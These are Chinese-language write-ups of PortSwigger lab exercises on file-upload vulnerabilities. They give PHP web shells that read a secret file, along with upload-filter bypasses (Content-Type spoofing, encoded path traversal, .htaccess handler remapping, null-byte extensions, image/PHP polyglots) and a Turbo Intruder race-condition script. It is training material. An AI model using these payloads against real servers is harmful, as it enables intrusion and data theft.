portswigger靶场上传漏洞实验

通过webshell上传远程代码并执行

靶场

file-upload-remote-code-execution-via-web-shell-upload

说明

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

题目要求获取文件内容，新建文件编写php代码

<?php echo file_get_contents('/home/carlos/secret'); ?>

在个人信息图片上传处上传该文件

访问该图片链接/files/avatars/evil.php

获取文件内容并提交

绕过Content-Type限制的上传漏洞

靶场

file-upload-web-shell-upload-via-content-type-restriction-bypass

说明

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件，响应提示只允许类型为image/png

<?php echo file_get_contents('/home/carlos/secret'); ?>

修改请求头

Content-Type: image/png

访问图像图片，获得文件内容，提交通过

通过路径遍历上传Webshell

Web shell upload via path traversal

靶场

file-upload-web-shell-upload-via-path-traversal

说明

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件

<?php echo file_get_contents('/home/carlos/secret'); ?>

访问图片，发现php代码被原封不动的打印出来，说明该目录下的php文件不会被执行

修改上传文件的POST请求。Content-Disposition里filename字段值在其之前加上一个../ 尝试提交

发现服务器响应和不加前无区别，猜测服务器对/做了过滤，使用url编码%2f代替/，尝试提交，服务器响应../文件.php上传成功

访问该图片，获取文件内容，提交通过

绕过文件扩展名黑名单上传Webshell

Web shell upload via extension blacklist bypass

靶场

file-upload-web-shell-upload-via-extension-blacklist-bypass

说明

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件

<?php echo file_get_contents('/home/carlos/secret'); ?>

服务器响应提醒不允许上传php文件，修改请求，修改文件名为.htaccess

修改Content-Tyoe为text/plain

修改文件内容为：

AddType application/x-httpd-php .l33t

提交请求，Apache服务器会将这个.htaccess文件作为配置文件并加载其内容，将.l33t拓展名文件作为php执行

再次提交php文件，在此之前将其拓展名从.php改为.l33t，尝试提交

访问该图片，获取文件内容，提交通过

通过混淆文件扩展名上传Webshell

Web shell upload via obfuscated file extension

靶场

file-upload-web-shell-upload-via-obfuscated-file-extension

说明

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件

<?php echo file_get_contents('/home/carlos/secret'); ?>

服务器响应，只接受png或jpg格式的文件

• Add semicolons or URL-encoded null byte characters before the file extension. If validation is written in a high-level language like PHP or Java, but the server processes the file using lower-level functions in C/C++, for example, this can cause discrepancies in what is treated as the end of the filename: exploit.asp;.jpg or exploit.asp%00.jpg

如果验证程序是用高级语言（如php）编写而文件处理是由较为低级的语言（c/c++）编写，%00空字符可能会被截断为文件名的结尾

修改请求文件名为.php%00.png，提交，注意到服务器响应The file avatars/evil.php has been uploaded

访问该图片，获取文件内容，提交通过

通过上传多语言Webshell的远程代码执行

Remote code execution via polyglot web shell upload

靶场

file-upload-remote-code-execution-via-polyglot-web-shell-upload

说明

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件

<?php echo file_get_contents('/home/carlos/secret'); ?>

服务器响应：只接受png/jpg格式的文件

windows下将png图片和php木马合并

copy png.png/b + php.php/a = pngphp.php

上传此pngphp.php文件，服务器在读取文件的时候根据其二进制特征判断为png文件

访问该图片，因为其后缀为php，服务器会将其代码执行，在图片乱码的最后，发现一串正常的字母数字字符串即为题目要求的文件内容

通过竞争条件上传 Webshell

Web shell upload via race condition

靶场

file-upload-web-shell-upload-via-race-condition

说明

This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them.

To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

You can log in to your own account using the following credentials: wiener:peter

提示

The vulnerable code that introduces this race condition is as follows:

<?php
$target_dir = "avatars/";
$target_file = $target_dir . $_FILES["avatar"]["name"];

// temporary move
move_uploaded_file($_FILES["avatar"]["tmp_name"], $target_file);

if (checkViruses($target_file) && checkFileType($target_file)) {
    echo "The file ". htmlspecialchars( $target_file). " has been uploaded.";
} else {
    unlink($target_file);
    echo "Sorry, there was an error uploading your file.";
    http_response_code(403);
}

function checkViruses($fileName) {
    // checking for viruses
    ...
}

function checkFileType($fileName) {
    $imageFileType = strtolower(pathinfo($fileName,PATHINFO_EXTENSION));
    if($imageFileType != "jpg" && $imageFileType != "png") {
        echo "Sorry, only JPG & PNG files are allowed\n";
        return false;
    } else {
        return true;
    }
}
?>

题解

进入个人信息页面上传头像处尝试上传包含此代码的php文件

<?php echo file_get_contents('/home/carlos/secret'); ?>

响应提示只接收png/jpg文件

查看题目提示的源代码，在检查文件前，会暂时将文件保存，检查不通过才会把文件删除，在这php检查代码的几十毫秒内若有查看此头像请求，将会触发竞争条件漏洞

使用repeater手动发送速度是不够快的

在burpsuite中安装Turbo Intruder插件，编写脚本代码

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,concurrentConnections=10,)	# 设置并发连接数
    request1 = ''' 提交php木马的请求 '''
    request2 = ''' 查看头像的请求 '''
    engine.queue(request1, gate='racel')	# 添加木马提交请求队列
    for i in range(5):
        engine.queue(request2, gate='racel')	# 添加五条图片请求队列
    engine.openGate('racel')	# 按队列发送
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

运行攻击，查看结果，其中查看图片请求的有三条响应状态码为200，查看这三条响应，获得密码字符串，提交通过